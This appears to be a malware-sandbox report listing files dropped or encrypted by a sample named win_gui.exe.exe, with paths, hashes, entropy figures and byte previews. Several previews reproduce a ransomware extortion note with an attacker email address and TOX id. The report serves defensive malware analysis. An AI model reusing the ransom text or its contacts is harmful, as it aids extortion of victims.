                                Preview:H.....x.....%|....m.1K+5...\ .......z:.E:.t.C...Z.)|....,.Qt?.._K$.S&.!>P..9..J....[...K...U..^...VI.z6\..]<i.d3....b..XIe.i...5.No..6N.L..|~m!?..,.Y|L.}$@........,..@V\b.....S.|....R8...MW..Q...Y.8^.1....M..daBg8..{..wX'.f.=.,..R.&...`..8.'D...!..-..v.i..Z.._..cD.Q..xnM.......>^.{..~t\..*..K...O...6.... .Y...|...r].e..h...5x.....J.e........<.fZ|.#.d..-y...}6z.Z._.@2..G.}).....B...^.....mZ..\.P......./..&..)v.Y33.IC.......a.....C...E.^J.H.[>.9.|s.sb5<..Z..5..'.q'.O.Ua........EcRK.N.!..}.+}.x....NU87..W.;.!n......JHb.j....K...=.;...c..T......mCc...7.V..:.z..s.N*+.P.Q9...{..$uM.....[j`.+'+.1;.c....#....`;c.V......c.rx.......K-.|.-..MB..Vx<.....T...:d.[."8.3I.n....q?t...d...ty.......?..^.m...j.........d..".c*..T...[.4..X..Uf.v...p....t..Zx...WIQ..~.(.....'...p..%,....5......]w.RL)........(...$...^.P^.xM3F.c...{P......]..L.=zKj....._./>"...g....1.+.p.".0..`j(........c.%l.:..MJ.....\T..ex...B.....,lO.Ou.....=..0i...6.St.y.R;W&K....Hz...2...aF

                                C:\Program Files (x86)\AutoIt3\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\SciTE\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2373216
                                Entropy (8bit):7.227069398524338
                                Encrypted:false
                                SSDEEP:49152:oSXoV72tpzOhPwi1aCvY1U2AluS0RsG4fYw44RxL2:14zwiICvYu2wIsG6W
                                MD5:AA633D4C7C9C15C6DEBB2CEC9501FDA2
                                SHA1:DA983CB71CF57066108F647AEE05236919ACEDEF
                                SHA-256:A978B83E0A4F4833BD273D7A9EE981CCB539C79F14D624345FC4AA8C2CC470C8
                                SHA-512:373E088A2543DC494E9E75F11D163C35EED36047603B4B5E15B4E3A91EF9EFFECD83C8D3E726137F5A3FC310DA1358B00D0D84C0E34795FF38C5B7CE0DCF23BE
                                Malicious:true
                                Preview:M"....m...4.^..x...d..`..R..soC7....H...Na.)&...pK..@.C.>..yE.+J...(I...(.\...F2.3.Y.....\...x).X..w~...3.!)0...:8.....U-....Y..#.2<.....?|L.Wo1w|.H...P...o..<,.0..C..K..da&..Ty.K.cu..8&..E..~.............2...M.g...S...dE...$e...C..=...h.rmN.R...&.2..k.ek..S.q..l..&w1.C...jX..Il...gU%...'kN.!..r.[...l.6......7J...Mus.).....j........{NK..).9e.z.C.3.....5....}...<._g:.$J....G....0.......VC.#y......Z..n.;.`g.D../.-hOn...#~*..Xq.r6.h.~.......<.........fR.j..e.V].a.g'...s..s.l(B.[$.....R%.C*_4...ov..BWl.(..:....Q(.....j UE6...tI..l.3O.Pj...b%..e.N...K....Q.c...+.*...`.#.%V.v...s&.3X..H....K9.m....s...( ...N....p.D......X..Jls.h.....t@.... 0.f.....f....-..n...`~Q.;...uF....NO...t..V......D?}...u.%f..s...C....l..$..~.........hu..P3..o.....nB.1.e.u.L..g..H..>......IA~....m.|.&..+..k9...3,B..hf..{.~.....59...b.;6..p.h.F.U..gc.f.._W.f..5._.....k.y...Z.(..Z..".hg..........j...0....w...KBZ>....t.n......%.|.Z...C..D.E.[u.W..Id3}_$9;5i.2z..

                                C:\Program Files (x86)\AutoIt3\SciTE\au3.keywords.properties

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):92207
                                Entropy (8bit):7.997951408458284
                                Encrypted:true
                                SSDEEP:1536:RbYV+FLE0z9WZ1tOu+hsUDwoUZb4dPw2q+1XDxWr64AZrT3JU:6V+FYE+XOXwow4lwIXDRhTZU
                                MD5:696D2CA1AF57D4D618905BF094584FAC
                                SHA1:D6B2E51167FA69B34568CE3726ECD4F0973BC935
                                SHA-256:ABA72D6685AD351F397FECCF732A25E40E29CB31712DE861D5D1FBD30E2E0418
                                SHA-512:7609D7FDEBA5E11AF13B00B3A402F99729F4B7B2E1232716F31B4AE1F683483A3AA6414CBF1D2358476A42306EA26356119009B84BAB3CCFCD2DC8FB63C6307B
                                Malicious:true
                                Preview:k...mT.....^..2)...3....8*2.!-..K.^.....[.e...^{7K..`...1(.......'..6........o...a.....Tr.GT....8.w..t....U8.h... .9.\U..F...GZ.H.w..RV. .D,.8........[..._../.b..Dy...R.aISF..#WF.....k.1...!..x..9D.&".Y....o......p-1V).ny..%.Tf..^NQ.s/^e....T..ie...7.g......b.....r.yO.J......,.z.i..S...6!...i....L...{..d...7....j..N.........L..!.j..4....0.|...%6RQpt3.m..[b\...0..{ATw...jH..E5_,.>M.0.%.r8..,.U....D...*b.&....M.Vo}.o.+...b&@7#...%.d.d*.wY...oO.5..B.0k.\....n...l....3....B.WI...ms....-..(g...N....B&r.)....... dd.#Z..2ac8..R.......A.e%.8<.Z./..5...t.2..rm...,Q....I..8$c3b..(.'&/...Y..:}.B.19......... ...I...h..p].:/.${.....zQ......y.#:..y..f.|...1.h.z..}Gj.J...-.n.........q."I.....n1|v...$.d0..j _.$\.......#.XR}(m=D..(>.5.....E.H...#.. ......Z.<..0\...5.. ..w.../"+....;.B,...m.z.B..F .*.......J..B........../]..&..1..|....(!..0..,{y<O...F>..MY.H.Z...u.e9...2.s.F"H0...A..].....W.SHw.............&.a.P.,..*..V.S,..l...y^dhVlW |EA.....\w/w.x..:...

                                C:\Program Files (x86)\AutoIt3\Uninstall.exe

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):72369
                                Entropy (8bit):7.997397042306235
                                Encrypted:true
                                SSDEEP:1536:NmNs1D50cNJks1xSZDfJTxtgyyK4LAuzfWzLAiyrbK0rr:ZfLjSVPiW41Xiyr3
                                MD5:55A4462794C4D62A168176F68CBC55A6
                                SHA1:F99C3A951F6C65175606567967418D6CC2607BBF
                                SHA-256:2D9F7E7EE22FE3F9C2248358AA9E6DE3690F33F1FA44FF3E7B6318EADBA17336
                                SHA-512:C1581EFCD2563780D4F4EC1E9EC97E5EA5C148C77A6B2867B86E17CDDCBA4D082FA113AAE1B58A2D55DF28B66C3418A2A3A60D6733B6424D6546B7CD3D621333
                                Malicious:true
                                Preview:.....].C:.3.8k..j.....1..MyR.U......Q.F......o..Ph.P...Sbr,."}..T^>.....8.Tk.H..=7.._/;.^....x....O=.W|...I,.q..1M...I...{.].w...H..B.Z.<.V.me...6..q"(_.~Gml.r...O;.7c....%^].rlH.Z..4}.......~X....p........G~..|..~X..p.(^......n.......k..8h..+....w|.;b.3s...?..Yd2...Q.L.2.Qzj..A......KzS....-#....e.U.....@..)X:...s.....ul=v..,:l^.....<..D.c....+Ml.tw.......O...X-r...[F.....=....\M....x....{..LK..fu...H.N.....@.2..y...}%`...9.G.f.....y..s..0.sY... N..e.R..86.tC..8...QR/.......+...\..H...9!Y..\D..h...f.{..o.......J.@...-.,wq~.t..Rm@L.J8....@.....}...{w@./-...G.j...QpcB.}@...-<.... ..-.:....../(U...q..9...h..#7.s./Q..........wp...:.*+.4...Q.y.1".C. -[...:TJ,...t......Z.9.x..[....p\..J......"....a...3..O.*)......J.....Y.._L.e..$....I...^*r.~....6.r..A0C..O6......../pE.`R5...s[.n..._.....u...|s..9e..+U.r&...Z\../+..]..P..=Q.N..W..6.&.o...y..).O.}."z...DX...S...~.<...3....v.s....X.7D{L...^...z.84b.7c..H..*-@..J1.[K.R._T..c.....g.../U.....r

                                C:\Program Files (x86)\COMEBaDYJEZtPnCPYFIRcLwBAtysmSXYTUEGiPYFhoKwjEtYOPojCACXlzyCfS\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\README.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\bin\WindowsAccessBridge-32.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):171232
                                Entropy (8bit):7.99877932025843
                                Encrypted:true
                                SSDEEP:3072:66tbjJoQBQYrpCQYDsa+gfih7kffgHYCwDRGNTejJMJ7XgLZIsTJh3t:6aJ5BQbRDszgqh7Hbey7XgLH/t
                                MD5:24EB09FA6E46F218CB62B6B0F8849263
                                SHA1:E8AFE1324F5929F7937490253D8F8FA691FFB678
                                SHA-256:6E04B515DA0A3792EC81DD9DF5A890B58DDE4FE43134616328AAA145F35B2850
                                SHA-512:9564896FA20B13E4784D0481EFBF62F79509813D8321254BE05609B6EDF172391470C1F06EC312CBFDF4F9A5FA792A84FFEBBF71C971D8BFEAFAB66EE95D70FC
                                Malicious:true
                                Preview:t...9.YNEU...T..r.i.$....`d..J}..N........^..g.K.Pb.U.c....[..l.Q.x..Ap.........*...iib.!........(#...F.l.vZ.."'`4hEI#..DD....i...%0T.Df)...!.....Y)>....,.y..u...I.z..BJ.E$..|.......<..aA.*..Bz...A}....O..q.....A.+$>.,...k....>......v.`<.&..%6.!...Z..$./.,.nA..z,<M.0...........l...c......N.C.+....L.....=.."V.:..R...F.B..g..K..B.\.P..\..u.c..2.F...@...J.2.7.8.i..K.t........J...Y.w.K.....?...#..5...M......JYS0mxk..ju.u_x.b.68...0.2.<..m.g;.a..9.....).St....e.5.... ...+.^l.77.B.FY...J.....&.Du...-..sU.6..].C.B..8..7.....'...<#.U../E....o|....Oi ...b%wc...B!....PX..` ....(...r.......Z..0.....$..Z.L...'.........x{....V@E..t..z?..=..W...-........0...gOv.O.......#..qL&.$.F....K.#2..%P..1.|.j....rD.+.....#[..9.........m.Vhj.fq5.4...!.....Y...........q...F}...d.=..-.1.q...l........:...#l7l...iC.......9B........x........u.)..........\...C..V..G..........Q.~...=V#.s-...~..6EJ....a[..M%1..EQ.h=d.n+.f-..&ai.^.,.jV.N.a.L.'.[/7........?Hb.N..!_.yJ..

                                C:\Program Files (x86)\Java\jre-1.8\bin\api-ms-win-crt-private-l1-1-0.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):66624
                                Entropy (8bit):7.997080360478528
                                Encrypted:true
                                SSDEEP:1536:Ns0EZ2y8+chPsz+181Tdx5zOVPVeTwPsxDTLaF:6zZ2Fh0aS1ZiVNrP4TLaF
                                MD5:CF9220E05F6B4F532F19CE62890BC8E3
                                SHA1:6A0E12DF092664D216B1FC065624B5F55C156FAB
                                SHA-256:07D88FDC6DAE4DD3E056353BBE9C18697D383F5EC52C9357506D1352F52E7C8E
                                SHA-512:D75CBDD69494242C56DB8431FB6D7A0F237186EE264226C073515E16B69AB3605F1DF1D2816C72BA1F1A6854952803602B944B0892ADF81FA5FA977DC06B4D1F
                                Malicious:true
                                Preview:....J......[$H*b..Q..o.~.;.ZI#...eV;...r.#CE#...)..64E..c.~y......6......."5...U......I.....!f$..J.. |4[....#x..3n.....%6;*.T ....y}@.Be...C. 1.....g...V.R......U..k.q?u...;.r..g.......ca......u.\.Y?.+.z.Z....v..._....B.Y..Wkp{.e..P=...A_0......1..?..R$.tm\z....6S.U.YU.B:.Y.fK9....)..B..).|.....c..G.pM...H.!......!Ad...t... ...^ ....n.u:.7bg..Y]..sD..d...6.p..(\,&...$.Q[.v(jK..k.h...j...f.$..F.......:.[.....Z6#Vt.K.6?.+.....?....A....w...........('N....n._ze...R*.w."..3&3.G.o....[.3<^.....9......*...rZd...7@.+........?..Gc3Z.P.m.m..C.pE'.2...a...C.JU.J.^..G...pz...U^G.'...K.'...{.U..,...J......l.x.j."...T....G..m.M......+>h...R7$..BM.\../:.GZx.dF.F.X ..2..J::gW%Y.>..8.... Ej`...O0N.b.._H.:L.2..!.@N,Y...ko.....Wx.....-..Z...+]._n..N.)nD.3.*..z...X..H;O....d...".=W..y*.0.?-.....E.g.G..x.../.......<....6..r)^...d.*J...g.i!4V{B0."..p........d)x.....R5..Ok.'..4...*....y..^;..Sy5}.-.....t..O&....Xf@m.N..b..{....(.&..<E....^.....<.

                                C:\Program Files (x86)\Java\jre-1.8\bin\api-ms-win-crt-process-l1-1-0.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12864
                                Entropy (8bit):7.986297556161904
                                Encrypted:false
                                SSDEEP:384:0XRMA4Z2zFtbva9mCBgf1P/DST+J1dKH8ZoUHX+VOI:vA+qPdCBgf1D9108ZoeX0
                                MD5:D268FFE2C40AE8A0A6879586D0CC7D00
                                SHA1:A222C77006F1BF7574BAB8179C6DE1FDE73729E4
                                SHA-256:4AC9A9994FC9FF2A0E34237C9A344200F6AB55183830B3CB57A111C9271EBABF
                                SHA-512:1E07387E89CCD26E8A58D1939B0A00DCFF63FE4ED5AD3086ECF601ED8EB9ECC36B22FDD8743A348F5847E5055664535E7EDD9A97D1F6F2C528FA1321A4E2A082
                                Malicious:false
                                Preview:x.D.{.e.....[..:....K.T......^..X2.Y.i...`.....F...Ma) .....E@....qx;...1...<.v...a7..:..y.*!.....-0.].....b.e.-.r...7..p....5.#..6^..&4..x...|i ..Gc....u....=...=.....tq.....l.....(.o.!&L_. 3.?.......u..U..}3xLD.\...,..41T.....T.}.....P*@.?DO............./.G)<m.......qN......F._.I...J.X..m......F..>....h`.x.4Xyc..b^...0.v.,.T..F..%.s..`-../...[....._.~.`.v..\...m*...$..`?...fA......a6..P+Co..Z..Q...SA.j<o...#H..=C^./.;.!. _.%...?.t.Ea..."....U$.z...E.Ve.....Z..9.!...R.\..!d...U..A.n.S...G.....V....).O....I..Qd>Y.....NT.;.%d..0q..l...uY...;...(..9.8_H.........j./<...t............C..^...H=....k....G.b..m....1.1.].$2.>...."..AN.vHz.b...jc.......v.?D.......}0....N..q@.r...(.......*.%1....-....]..V....|.Ce.....}.V.....4.td..C.(...c......s.....pV<.......K/...e...2.....e..t...>.H....).ca.azgA...y.....Ot...../$..<..D.p.k...N..tS;.=q..u...RH..5..w4`.'.5..o9..C..8H..."..=..Z..<.=..Y.u.[...B.# <.wO.'_.".).a..$.j.1.lm.?...g=CR..s.\....s

                                C:\Program Files (x86)\Java\jre-1.8\bin\api-ms-win-crt-runtime-l1-1-0.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):7.9887060938908165
                                Encrypted:false
                                SSDEEP:384:aOsn8nQ+wtdqASIopCnSiOHz9+31ZGCTDshjFt9sb4aFo8h+VOh:a7np+wtdqbTes9MJT4179RaFo8hN
                                MD5:160399FA63DABAE089ECC49717A9AA50
                                SHA1:60E741DBDB60D6CC8CB33F7F95CAA5BB58702B08
                                SHA-256:C85FD6DDCFA50BBCF63C50C77B4036442DB46C361221F504225A8EA4ADF264BC
                                SHA-512:D492753F27D80A0D1B828249D9B8417BEB8B8B25A1AEF95FB90616A23F7115447DC61A724AD11B8949BD77AB8BB1A9EEB17EC3026460F1DBB3843C4662EE6163
                                Malicious:false
                                Preview:.. .......,.8.T{...y.V..7'....:.....yS.M.:d.s.n...e.Y..V+.[..W.......X.T^FT...s.Oo..._i'.a.......P..Q([.[/....M..k...%-g.4...&`.J'*.m..kFA..^.`...O..)(.N...?.....k....b.HD....5e...>.i.<8....8W.|...#.`.........7h.n.P....nP\....Q8&MJ..h8.m...U.{`...L.?v)JD.5b2*o..cl.}7..$.5.1..B.....b$.gI.f....}...@C./.5..+.#V..Y3JX.1./..oe.U.j..r.......)JF......V.....[s.9...y.C.....>........$..%.W.nkJ.).w0.^L0...c[.l1...u.......3...<...O...gEb......mx.x5.:....b..b8......>.u.'.....,?....z..aQK....qe..q;..X.W..].q..>+.A...a...]1>KD..\..O..I"..6S.w..A....m<..r.u.o.u.B.2e....U..D.3#...~.|......k.....Xf..v.?.,.HEn....;.zZ..*.z.lD*E.#.z.!D......A.(.Qd..?T.I..o<..Vr.g0....s.B..:,s!.Ya.9!.s.1......r!Y*J.../.+.WZ'.w.R'Hl.......]..5..z.xJEV...~..i.'.....!G... .r....N.!%p.K.M.,.V..2)...m.....a..I.....T.g.kM22d.N.5.M...*t.@...-.."...38..P....o...e...%o|.\.%.......>.^..E.*K(b]..n..QVI6*.....g........7....zIG{J...0...(..P..Y0....\....B.q.H...<.....}Q?. ...E

                                C:\Program Files (x86)\Java\jre-1.8\bin\api-ms-win-crt-stdio-l1-1-0.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17984
                                Entropy (8bit):7.989260435680841
                                Encrypted:false
                                SSDEEP:384:T1eiU5wdx3wpG2CtFtpBMjOWEWAU4cwY5FsIdoJglCOXdf5iLtMZD4jEDxP5p+VB:TfOOpcviBMnAU/X9oJ0XGO4QD95pg
                                MD5:8F944268E1221D0DE23D5502289D7F96
                                SHA1:E25B5AB7E0E7B9935C25FFEA704FEA46DB98594B
                                SHA-256:56B6B00F70C11D5F8E1CF5610979DA7C4AC933B6C9C0904310AE471A1EC1ABF1
                                SHA-512:1D47E7EE798C9F762A4D76C533B1F88A61523CECB16C376FC7B70E16D4613F65A8BB0183E3C465BE3B01094E79E9D8E83DA1DE0A88377B1F3FAD83488A1CF635
                                Malicious:false
                                Preview:(!...e...S`i~.z..A%..E2.n..^..J7..GM.=....O...........CHb>-.?hL.72....=F...`...V.........bIc.^>.A.X..B.3.+.FCN.g.h .<.../0.W~"{..*G..}...Ei.`~.p....|..\2Q....a..&b.IO.....<1...t.5....i.Gn./..#....T.mAX.T.Q....=.L.I&.JO....o.*....Bx..L``..M..6..#.P.u.i.T....."..1}.....j....}....5k.I.....E0i?.o..X..v.1a.?_.I....rm.M........iZR..'.;.....|.>..k.`......<..E./... .....W[...'.7Vi..%..So..Ur..c..s.....3.U.#..R$...Rk.-.d@.E\.@...z~...m..f....-...'l/$.c(Bk.."p1%.o.t......,#3I.Z=vn.L.N....5N..%D.u..\;bH@......../.....VstB..W.^r..~.9....mo....I.2:(.V...y....3...6..j2.^K.'..F....~... .1......*L...Y..|..D..jm!qd.{..........i..u=8x:...P...gC........!p.h....<..V.6$... K..<.f.U.v..E=.'..C.S.. .......l....h.3..Q..P6s..{2.....W..f..6.[...~.g;......'...`..j.@..-..6...b.u.81..V..6].........*.T.)."...Kl6!.}u....N.....]a8...\..;._!.'..7lp.~.N...9.........yi'.~....G]{-.Kj.R.+.NItc.h.-......cx....j...w=+f..I...d.)}..r...zF.S..#=...A..$.....y.......W..O..B

                                C:\Program Files (x86)\Java\jre-1.8\bin\api-ms-win-crt-string-l1-1-0.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):18496
                                Entropy (8bit):7.988552136784182
                                Encrypted:false
                                SSDEEP:384:LdrbtI83SVU9leVmb60DfEIA1zHCMJzPFG5Oe8kUKe9d9MNo8gMqEDQ+VOl3:RrbKhq9leVmmccNNmUSqfd
                                MD5:AA171E4B73C2DC8058BC29FDD9AA45C0
                                SHA1:F42A03A982C880492DA01EE52E760BA2BF90C5A0
                                SHA-256:8714048B56D0C6132E9FBE06D202B66ABA125FCE89AA2C8C49EADCD3708366B2
                                SHA-512:C9E3EDC0DC26044B0F9B6AD7D7150D30741B697B9E5690BBE3CC4FECDCCD4022BE412984CD263AEE761A4D1B26A2110228DEDF4D0F56108715973D44A9E7EDDC
                                Malicious:false
                                Preview:..zSW.T..../."......kB.W..+....`.4b.......`2#*..R..I?....sP]......cx<..W.A.E.'.>..0.?.!...9.$1.}...i.'Q^..,B._._...T]m.....M....7K./3...|1.{.2...a7.Hi.\x...`{X.w.M...W....P..O#g..a.Q.....*.{/.(5*..}......)E.....-g....C...:..K..PRE..x[.=!p.D\....E..xQ.O .^..(.[.X..n)..@..`.q.>?...x.sAd..Y...Ui...C.j.$......5.O.e,.....j.[$.3'].....U...:m.P...-2...Jz.1.r....m>.y.F...U}..........ja........3..d,.+z........e...P.....a..rY..w.z..R..q.i..L.u.|..I...j.v.)I..vcVH..@`..Rh<..E...O5Dey......ds....hk=..0R....w..?$?..<..SI.t.hfeb._.y..^.Kh*.#.w....1..>d..`.$.j..\..#%...,....Zg..@......z.....)!S..?(.....u9...Z>..&[.*..c...D..........=...5....}=...JC.l.$.3.7...vl.v.I...3<*....g/.........y...(L...Ke.....q..|_.....T-.(..R.j.]Yif.V$.D4..EH..H.e.....x.(.J.IT.m.c..... ...S.3..!..e~7...,..VT:1....u.o.#..v@M..+..z.x.Y{#.'.......n...HE.1..0.....N.k.{..KW.).k......'MuUz_.T....I.F..w.t........Q^..}...E...2.0..&.k.h.SHJ.\D...[\....Mom..w8........W.fz.r.!r.....Y:.....i}..

                                C:\Program Files (x86)\Java\jre-1.8\bin\api-ms-win-crt-time-l1-1-0.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14400
                                Entropy (8bit):7.986587460488451
                                Encrypted:false
                                SSDEEP:384:DPuCT8a2JikFsrBwr3n5PkTnKIf1RdOrDAc+VOq:DPH49Ji+D9BKKrEcG
                                MD5:EA0DC7A7FFBFCC60CBBE8B0B02B228C6
                                SHA1:532695866055A3B9D432FD13F1FD34044325ED6D
                                SHA-256:30A74DAC7EC18FFE46672863087D7E053881D16340263F055538414AB10BD674
